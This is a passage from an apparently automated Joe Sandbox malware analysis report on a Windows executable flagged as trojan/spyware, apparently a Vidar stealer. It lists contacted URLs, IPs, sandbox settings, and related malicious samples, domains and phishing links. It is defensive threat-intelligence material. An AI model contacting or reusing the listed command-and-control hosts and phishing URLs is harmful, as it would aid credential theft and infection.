                                                                                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477gVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://msn.comXIDv10Cookies.9.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://www.onenote.com/stickynotes?isEdgeHub=true&auth=222db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://www.onenote.com/stickynotes?isEdgeHub=true&auth=122db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://chrome.google.com/webstore/manifest.json.8.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://y.music.163.com/m/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://unitedstates2.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://bard.google.com/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://toptek.sbsosh;gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://browser.events.data.msn.com/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://t.me/gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000083E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://toptek.sbs/HgVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://web.whatsapp.com22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://toptek.sbs/LgVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  https://web.telegram.orggVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000881000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://m.kugou.com/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://www.office.com22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://outlook.live.com/mail/0/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://toptek.sbs/LGgVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            https://toptek.sbs/OgVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000089D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiP8QIEK.0.drfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://ntp.msn.com/edge/ntp2cc80dabc69f58b6_1.8.dr, 000003.log0.8.drfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  http://www.microsoft.xZgVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                    https://assets.msn.com/resolver/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://powerpoint.new?from=EdgeM365Shoreline22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=gVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://toptek.sbsQQ16FUSJgVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            https://tidal.com/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                              https://ntp.msn.com000003.log7.8.dr, 2cc80dabc69f58b6_0.8.drfalse
                                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                                https://browser.events.data.msn.cn/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                                  https://gaana.com/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                                                    		high

                                                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                    149.154.167.99
                                                                                                                                                                                                                                                    		t.meUnited Kingdom
                                                                                                                                                                                                                                                    		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                    142.250.181.132
                                                                                                                                                                                                                                                    		www.google.comUnited States
                                                                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    18.164.116.39
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                    162.159.61.3
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    20.189.173.14
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                    20.110.205.119
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                    204.79.197.219
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                    142.250.181.65
                                                                                                                                                                                                                                                    		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                    23.44.201.40
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                    172.64.41.3
                                                                                                                                                                                                                                                    		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    23.209.72.7
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                    23.44.201.28
                                                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                                                                    		unknownReserved
                                                                                                                                                                                                                                                    		unknownunknownfalse
                                                                                                                                                                                                                                                    94.130.188.57
                                                                                                                                                                                                                                                    		toptek.sbsGermany
                                                                                                                                                                                                                                                    		24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                                    18.165.220.110
                                                                                                                                                                                                                                                    		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                    		3MIT-GATEWAYSUSfalse

                                                                                                                                                                                                                                                    Private

                                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                                    192.168.2.5
                                                                                                                                                                                                                                                    127.0.0.1

                                                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                    Analysis ID:1579643
                                                                                                                                                                                                                                                    Start date and time:2024-12-23 06:56:24 +01:00
                                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                    Overall analysis duration:0h 5m 37s
                                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                    Number of analysed new started processes analysed:20
                                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                                    Sample name:gVKsiQIHqe.exe
                                                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                                                    Original Sample Name:2e45d5934db7da8ff7b560a80ceb96ab.exe
                                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@63/316@26/17
                                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                    • Successful, ratio: 98%
                                                                                                                                                                                                                                                    • Number of executed functions: 56
                                                                                                                                                                                                                                                    • Number of non-executed functions: 46
                                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.19.206, 64.233.164.84, 23.32.238.242, 142.250.181.142, 172.217.17.67, 192.229.221.95, 142.250.181.74, 172.217.19.234, 142.250.181.138, 172.217.21.42, 172.217.19.10, 172.217.19.170, 142.250.181.42, 142.250.181.10, 172.217.17.74, 172.217.17.42, 142.250.181.106, 172.217.19.202, 216.58.208.234, 172.217.17.46, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 172.217.19.238, 13.107.6.158, 13.87.96.169, 23.32.238.138, 2.19.198.56, 2.16.158.81, 2.16.158.82, 2.16.158.91, 2.16.158.88, 2.16.158.80, 2.16.158.96, 2.16.158.97, 2.16.158.75, 2.16.158.90, 23.32.238.210, 23.32.238.226, 23.32.238.200, 23.32.238.202, 23.32.238.225, 23.32.238.194, 23.32.238.216, 23.32.238.208, 23.32.238.201, 2.16.158.59, 2.16.158.58, 2.16.158.74, 2.16.158.72, 104.126.37.130, 104.126.37.179, 104.126.37.177, 104.126.37.123, 104.126.37.178, 104.126.37.186, 104.126.37.184, 104.126.37.185, 104.126.37.128, 13.107.21.237, 204.79.197.237, 13.74.129.1, 172.165.61.93, 217.20.58.1
                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-agic-us-3.uksouth.cloudapp.azure.com, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, arc.msn.com, redirector.gvt1.com, www.bing.com.edgekey.net, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, config.edge.skype.com, op
                                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                                                    No simulations

                                                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    162.159.61.3trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                        SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                    pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                                        http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                                        http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                                        http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                                        http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                                        http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/?setln=pl
                                                                                                                                                                                                                                                                        http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                                        http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • telegram.dog/
                                                                                                                                                                                                                                                                        LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                                        • t.me/cinoshibot
                                                                                                                                                                                                                                                                        jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                                        • t.me/cinoshibot
                                                                                                                                                                                                                                                                        18.164.116.39file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                          http://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:3a03de0d-9ad9-478c-a00b-f8cf4aad7ad9Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                                                                            https://jfb.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2FpasswordGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                              https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6InJlc3VsdDMxNzdAZ21haWwuY29tIiwicmVxdWVzdElkIjoiZmE2MjkzNzktOGVlOS00ZDkxLTU2NGYtODZlN2Q1MjBhMTgxIiwibGluayI6Imh0dHBzOi8vYWNyb2JhdC5hZG9iZS5jb20vaWQvdXJuOmFhaWQ6c2M6VkE2QzI6NTIyMzBiMDgtOTVhMi00YWM0LWE1NzUtODJlOGU4OGQ0ZDQxIiwibGFiZWwiOiIxMSIsImxvY2FsZSI6ImVuX1VTIn0.6QK9gd12KmAWhogZmxgLuCkLGY2E_zrbMQmdhhDyRIOYPSXcqy0OWeli3WNWeGYHCbKTmQtprFT1CJf99ywr0gGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                                                                                https://ddec1-0-en-ctp.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2facrobat.adobe.com%2fid%2furn%3aaaid%3asc%3aVA6C2%3a2a138187%2d69c4%2d4ab4%2d842d%2dee0003585bc9&umid=48a0bf19-c23f-4ede-a21a-c8110fd2ff5e&auth=3396b606d81544f1fa36c033f23b9c9aa919296a-56125daf7e96fa7cc3eab78dc35383db072b630fGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                  https://acrobat.adobe.com/id/urn:aaid:sc:EU:0b83ebe6-92d6-4f29-9c78-2fc411750345Get hashmaliciousHtmlDropper, HTMLPhisherBrowse

                                                                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                    toptek.sbstrZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.130.188.57
                                                                                                                                                                                                                                                                                    9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.130.188.57
                                                                                                                                                                                                                                                                                    AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                    • 94.130.188.57
                                                                                                                                                                                                                                                                                    GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.130.188.57
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                    • 94.130.188.57
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                    • 94.130.188.57
                                                                                                                                                                                                                                                                                    t.metrZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznjGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    chrome.cloudflare-dns.comtrZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    invoice.docmGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                    ssl.bingadsedgeextension-prod-europe.azurewebsites.nettrZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                                                    QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 94.245.104.56

                                                                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                    TELEGRAMRUtrZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                                                    tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                                                    setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.220
